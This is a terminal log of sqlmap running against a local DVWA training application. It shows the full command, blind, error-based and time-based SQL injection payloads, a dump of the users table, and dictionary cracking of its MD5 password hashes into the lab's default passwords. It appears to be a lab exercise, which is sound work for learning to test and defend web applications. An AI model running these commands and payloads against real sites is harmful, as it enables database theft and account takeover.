 $ sqlmap --url="http://127.0.0.1:42001/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="PHPSESSID=tnusaaspju33gd737338bcnhrl; security=low" --data="id=1&Submit=Submit" -p id -T users --batch --threads 5 --dump
         ___
     __H__
 ___ ___[']_____ ___ ___  {1.7.12#stable}
 |_ -| . [(]     | .'| . |
 |___|_  [']_|_|_|__,|  _|
     |_|V...       |_|   https://sqlmap.org

 [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

 [*] starting @ 10:42:51 /2023-12-14/

 [10:42:51] [INFO] resuming back-end DBMS 'mysql'
 [10:42:51] [INFO] testing connection to the target URL
 sqlmap resumed the following injection point(s) from stored session:
 ---
 Parameter: id (GET)
     Type: boolean-based blind
     Title: AND boolean-based blind - WHERE or HAVING clause
     Payload: id=1' AND 2879=2879 AND 'FGUV'='FGUV&Submit=Submit

     Type: error-based
     Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
     Payload: id=1' AND (SELECT 5082 FROM(SELECT COUNT(*),CONCAT(0x716b627071,(SELECT (ELT(5082=5082,1))),0x717a716a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'VSXt'='VSXt&Submit=Submit

     Type: time-based blind
     Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
     Payload: id=1' AND (SELECT 9523 FROM (SELECT(SLEEP(5)))RuBI) AND 'DZYn'='DZYn&Submit=Submit
 ---
 [10:42:51] [INFO] the back-end DBMS is MySQL
 web application technology: Nginx 1.24.0
 back-end DBMS: MySQL >= 5.0 (MariaDB fork)
 [10:42:51] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
 [10:42:51] [INFO] fetching current database
 [10:42:51] [INFO] retrieved: 'dvwa'
 [10:42:51] [INFO] fetching columns for table 'users' in database 'dvwa'
 [10:42:51] [INFO] starting 5 threads
 [10:42:51] [INFO] retrieved: 'user_id'
 [10:42:51] [INFO] retrieved: 'first_name'
 [10:42:52] [INFO] retrieved: 'last_name'
 [10:42:52] [INFO] retrieved: 'password'
 [10:42:52] [INFO] retrieved: 'int(6)'
 [10:42:52] [INFO] retrieved: 'user'
 [10:42:52] [INFO] retrieved: 'varchar(15)'
 [10:42:52] [INFO] retrieved: 'varchar(15)'
 [10:42:52] [INFO] retrieved: 'varchar(15)'
 [10:42:52] [INFO] retrieved: 'varchar(32)'
 [10:42:52] [INFO] retrieved: 'avatar'
 [10:42:52] [INFO] retrieved: 'last_login'
 [10:42:52] [INFO] retrieved: 'varchar(70)'
 [10:42:52] [INFO] retrieved: 'failed_login'
 [10:42:52] [INFO] retrieved: 'timestamp'
 [10:42:52] [INFO] retrieved: 'int(3)'
 [10:42:52] [INFO] fetching entries for table 'users' in database 'dvwa'
 [10:42:52] [INFO] starting 5 threads
 [10:42:52] [INFO] retrieved: 'admin'
 [10:42:52] [INFO] retrieved: 'gordonb'
 [10:42:52] [INFO] retrieved: '1337'
 [10:42:52] [INFO] retrieved: 'smithy'
 [10:42:52] [INFO] retrieved: 'pablo'
 [10:42:52] [INFO] retrieved: '/hackable/users/admin.jpg'
 [10:42:52] [INFO] retrieved: '/hackable/users/gordonb.jpg'
 [10:42:52] [INFO] retrieved: '/hackable/users/1337.jpg'
 [10:42:52] [INFO] retrieved: '/hackable/users/pablo.jpg'
 [10:42:52] [INFO] retrieved: '0'
 [10:42:52] [INFO] retrieved: '/hackable/users/smithy.jpg'
 [10:42:52] [INFO] retrieved: '0'
 [10:42:52] [INFO] retrieved: '0'
 [10:42:52] [INFO] retrieved: '0'
 [10:42:52] [INFO] retrieved: 'admin'
 [10:42:52] [INFO] retrieved: 'Hack'
 [10:42:52] [INFO] retrieved: '0'
 [10:42:52] [INFO] retrieved: 'Pablo'
 [10:42:52] [INFO] retrieved: '2023-12-12 14:29:30'
 [10:42:52] [INFO] retrieved: 'Gordon'
 [10:42:52] [INFO] retrieved: '2023-12-12 14:29:30'
 [10:42:52] [INFO] retrieved: 'Bob'
 [10:42:52] [INFO] retrieved: '2023-12-12 14:29:30'
 [10:42:52] [INFO] retrieved: '2023-12-12 14:29:30'
 [10:42:52] [INFO] retrieved: 'admin'
 [10:42:52] [INFO] retrieved: 'Me'
 [10:42:52] [INFO] retrieved: '2023-12-12 14:29:30'
 [10:42:52] [INFO] retrieved: 'Picasso'
 [10:42:52] [INFO] retrieved: '5f4dcc3b5aa765d61d8327deb882cf99'
 [10:42:52] [INFO] retrieved: '8d3533d75ae2c3966d7e0d4fcc69216b'
 [10:42:52] [INFO] retrieved: 'Brown'
 [10:42:52] [INFO] retrieved: 'Smith'
 [10:42:52] [INFO] retrieved: '0d107d09f5bbe40cade3de5c71e9e9b7'
 [10:42:52] [INFO] retrieved: '3'
 [10:42:52] [INFO] retrieved: '5f4dcc3b5aa765d61d8327deb882cf99'
 [10:42:52] [INFO] retrieved: 'e99a18c428cb38d5f260853678922e03'
 [10:42:52] [INFO] retrieved: '4'
 [10:42:52] [INFO] retrieved: '1'
 [10:42:52] [INFO] retrieved: '2'
 [10:42:52] [INFO] retrieved: '5'
 [10:42:52] [INFO] recognized possible password hashes in column 'password'
 do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
 do you want to crack them via a dictionary-based attack? [Y/n/q] Y
 [10:42:52] [INFO] using hash method 'md5_generic_passwd'
 what dictionary do you want to use?
 [1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
 [2] custom dictionary file
 [3] file with list of dictionary files
 > 1
 [10:42:52] [INFO] using default dictionary
 do you want to use common password suffixes? (slow!) [y/N] N
 [10:42:52] [INFO] starting dictionary-based cracking (md5_generic_passwd)
 [10:42:52] [INFO] starting 16 processes
 [10:42:53] [INFO] cracked password 'abc123' for hash 'e99a18c428cb38d5f260853678922e03'
 [10:42:53] [INFO] cracked password 'charley' for hash '8d3533d75ae2c3966d7e0d4fcc69216b'
 [10:42:54] [INFO] cracked password 'letmein' for hash '0d107d09f5bbe40cade3de5c71e9e9b7'
 [10:42:55] [INFO] cracked password 'password' for hash '5f4dcc3b5aa765d61d8327deb882cf99'
 Database: dvwa
 Table: users
 [5 entries]
 +---------+---------+-----------------------------+---------------------------------------------+-----------+------------+---------------------+--------------+
 | user_id | user    | avatar                      | password                                    | last_name | first_name | last_login          | failed_login |
 +---------+---------+-----------------------------+---------------------------------------------+-----------+------------+---------------------+--------------+
 | 1       | admin   | /hackable/users/admin.jpg   | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin     | admin      | 2023-12-12 14:29:30 | 0            |
 | 2       | gordonb | /hackable/users/gordonb.jpg | e99a18c428cb38d5f260853678922e03 (abc123)   | Brown     | Gordon     | 2023-12-12 14:29:30 | 0            |
 | 3       | 1337    | /hackable/users/1337.jpg    | 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  | Me        | Hack       | 2023-12-12 14:29:30 | 0            |
 | 4       | pablo   | /hackable/users/pablo.jpg   | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  | Picasso   | Pablo      | 2023-12-12 14:29:30 | 0            |
 | 5       | smithy  | /hackable/users/smithy.jpg  | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith     | Bob        | 2023-12-12 14:29:30 | 0            |
 +---------+---------+-----------------------------+---------------------------------------------+-----------+------------+---------------------+--------------+

 [10:42:56] [INFO] table 'dvwa.users' dumped to CSV file '/home/kali/.local/share/sqlmap/output/127.0.0.1/dump/dvwa/users.csv'
 [10:42:56] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/127.0.0.1'

 [*] ending @ 10:42:56 /2023-12-14/
